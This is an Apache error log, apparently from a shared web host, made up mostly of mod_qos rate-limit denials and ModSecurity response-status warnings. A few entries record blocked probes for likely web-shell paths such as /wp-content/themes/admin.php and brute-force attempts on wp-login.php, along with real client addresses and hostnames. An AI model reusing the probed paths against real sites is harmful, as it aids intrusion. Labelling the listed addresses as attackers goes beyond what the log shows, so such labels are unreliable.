[Tue May 26 20:00:04.679052 2026] [qos:error] [pid 106517:tid 106662] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X3AAAAJE
[Tue May 26 20:00:04.679860 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7HAAAAAs
[Tue May 26 20:00:04.688954 2026] [qos:error] [pid 106517:tid 106759] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X3QAAAPE
[Tue May 26 20:00:04.693020 2026] [qos:error] [pid 106517:tid 106740] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X3gAAAN4
[Tue May 26 20:00:04.700294 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7HQAAAHs
[Tue May 26 20:00:04.724126 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7HgAAACk
[Tue May 26 20:00:04.736671 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7IQAAAFw
[Tue May 26 20:00:04.736836 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7IgAAAFA
[Tue May 26 20:00:04.751224 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7JgAAAAM
[Tue May 26 20:00:04.763156 2026] [security2:error] [pid 93576:tid 93785] [client 103.163.220.38:47465] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/admin.php"] [unique_id "ahWubGDRMqfxdEDkosz7JwAAAEk"]
[Tue May 26 20:00:04.778454 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7KAAAAE4
[Tue May 26 20:00:04.830469 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X4AAAAP4
[Tue May 26 20:00:04.833420 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7KQAAAF8
[Tue May 26 20:00:04.838242 2026] [qos:error] [pid 106517:tid 106702] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X4QAAALg
[Tue May 26 20:00:04.847998 2026] [qos:error] [pid 106517:tid 106691] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X4gAAAK0
[Tue May 26 20:00:04.851814 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7KgAAABg
[Tue May 26 20:00:04.876117 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7MAAAAEg
[Tue May 26 20:00:04.890833 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7MQAAABM
[Tue May 26 20:00:04.890998 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7MgAAAFM
[Tue May 26 20:00:04.906558 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7MwAAABU
[Tue May 26 20:00:04.926568 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7NAAAAFA
[Tue May 26 20:00:04.979983 2026] [qos:error] [pid 106517:tid 106761] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X5AAAAPM
[Tue May 26 20:00:04.988122 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubGDRMqfxdEDkosz7NQAAAG4
[Tue May 26 20:00:04.989185 2026] [qos:error] [pid 106517:tid 106687] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubIZZc2DoU1lPnP1X5gAAAKk
[Tue May 26 20:00:05.002608 2026] [qos:error] [pid 106517:tid 106717] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubYZZc2DoU1lPnP1X5wAAAMc
[Tue May 26 20:00:05.004558 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7OAAAADI
[Tue May 26 20:00:05.026288 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7OQAAAAQ
[Tue May 26 20:00:05.045454 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7OgAAAE4
[Tue May 26 20:00:05.046370 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7OwAAAE4
[Tue May 26 20:00:05.061759 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7PAAAAEg
[Tue May 26 20:00:05.075902 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7PQAAAFM
[Tue May 26 20:00:05.130278 2026] [qos:error] [pid 106517:tid 106715] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubYZZc2DoU1lPnP1X6wAAAMU
[Tue May 26 20:00:05.143796 2026] [qos:error] [pid 106517:tid 106723] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubYZZc2DoU1lPnP1X7AAAAM0
[Tue May 26 20:00:05.150341 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7QQAAAC8
[Tue May 26 20:00:05.156914 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7QgAAAHs
[Tue May 26 20:00:05.173428 2026] [qos:error] [pid 106517:tid 106686] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubYZZc2DoU1lPnP1X7QAAAKg
[Tue May 26 20:00:05.177257 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7QwAAACk
[Tue May 26 20:00:05.200032 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7RAAAAHI
[Tue May 26 20:00:05.200289 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7RQAAAG4
[Tue May 26 20:00:05.215936 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7RwAAAAQ
[Tue May 26 20:00:05.226875 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7SQAAAE8
[Tue May 26 20:00:05.279308 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XdQAAANI"]
[Tue May 26 20:00:05.282307 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XZgAAAJ0"]
[Tue May 26 20:00:05.282316 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XQAAAAJU"]
[Tue May 26 20:00:05.285936 2026] [security2:error] [pid 106517:tid 106692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XcwAAAK4"]
[Tue May 26 20:00:05.288210 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XfAAAANg"]
[Tue May 26 20:00:05.295669 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XZQAAAOY"]
[Tue May 26 20:00:05.309886 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua2DRMqfxdEDkosz6mQAAAFo"]
[Tue May 26 20:00:05.310091 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua2DRMqfxdEDkosz6nAAAAGk"]
[Tue May 26 20:00:05.310854 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua2DRMqfxdEDkosz6jAAAAGY"]
[Tue May 26 20:00:05.312357 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XmwAAAL4"]
[Tue May 26 20:00:05.317481 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua2DRMqfxdEDkosz6mwAAAHk"]
[Tue May 26 20:00:05.317481 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XegAAAJM"]
[Tue May 26 20:00:05.317805 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua2DRMqfxdEDkosz6hwAAAGA"]
[Tue May 26 20:00:05.331843 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XnwAAAKI"]
[Tue May 26 20:00:05.338700 2026] [security2:error] [pid 106517:tid 106704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XfwAAALo"]
[Tue May 26 20:00:05.346078 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XfgAAAOU"]
[Tue May 26 20:00:05.360883 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XnQAAAIY"]
[Tue May 26 20:00:05.362503 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XmgAAAQQ"]
[Tue May 26 20:00:05.365815 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XdwAAAOs"]
[Tue May 26 20:00:05.381855 2026] [security2:error] [pid 106517:tid 106675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XoAAAAJ4"]
[Tue May 26 20:00:05.382126 2026] [security2:error] [pid 106517:tid 106654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XswAAAIk"]
[Tue May 26 20:00:05.382765 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWua4ZZc2DoU1lPnP1XfQAAAKc"]
[Tue May 26 20:00:05.382835 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz60QAAAAc"]
[Tue May 26 20:00:05.384823 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz67gAAAAE"]
[Tue May 26 20:00:05.399928 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz60gAAAAk"]
[Tue May 26 20:00:05.400391 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz67AAAADQ"]
[Tue May 26 20:00:05.412368 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz67QAAAEY"]
[Tue May 26 20:00:05.412656 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz66gAAADE"]
[Tue May 26 20:00:05.449708 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XywAAAO4"]
[Tue May 26 20:00:05.451505 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XxgAAAMw"]
[Tue May 26 20:00:05.456289 2026] [security2:error] [pid 106517:tid 106694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XyAAAALA"]
[Tue May 26 20:00:05.456380 2026] [security2:error] [pid 106517:tid 106726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1X0AAAANA"]
[Tue May 26 20:00:05.540026 2026] [security2:error] [pid 106517:tid 106624] [remote 212.224.100.2:38731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWubYZZc2DoU1lPnP1X-wAA72g"]
[Tue May 26 20:00:05.547455 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWubYZZc2DoU1lPnP1YKAAAAP8
[Tue May 26 20:00:05.548207 2026] [qos:error] [pid 106517:tid 106698] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWubYZZc2DoU1lPnP1YKQAAALQ
[Tue May 26 20:00:05.554695 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7jgAAAAM
[Tue May 26 20:00:05.555965 2026] [qos:error] [pid 106517:tid 106747] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWubYZZc2DoU1lPnP1YKwAAAOU
[Tue May 26 20:00:05.574265 2026] [security2:error] [pid 106517:tid 106733] [client 103.163.220.7:43291] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/radio.php"] [unique_id "ahWubYZZc2DoU1lPnP1YLQAAANc"]
[Tue May 26 20:00:05.590213 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7jwAAAHo
[Tue May 26 20:00:05.592168 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7kAAAAHg
[Tue May 26 20:00:05.598509 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7kQAAABw
[Tue May 26 20:00:05.605444 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7kgAAAEs
[Tue May 26 20:00:05.605681 2026] [qos:error] [pid 106517:tid 106651] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubYZZc2DoU1lPnP1YLgAAAIY
[Tue May 26 20:00:05.607222 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7kwAAAFs
[Tue May 26 20:00:05.699966 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7lwAAABU
[Tue May 26 20:00:05.703361 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubYZZc2DoU1lPnP1YMQAAAP4
[Tue May 26 20:00:05.737861 2026] [security2:error] [pid 106517:tid 106736] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1X7wAAANo"]
[Tue May 26 20:00:05.824529 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7nAAAAE4
[Tue May 26 20:00:05.826244 2026] [qos:error] [pid 106517:tid 106710] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubYZZc2DoU1lPnP1YNAAAAMA
[Tue May 26 20:00:05.939860 2026] [security2:error] [pid 106517:tid 106524] [remote 212.224.100.2:38731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWubYZZc2DoU1lPnP1YNQAApwQ"], referer: https://soto-plumbing.com/wp-login.php
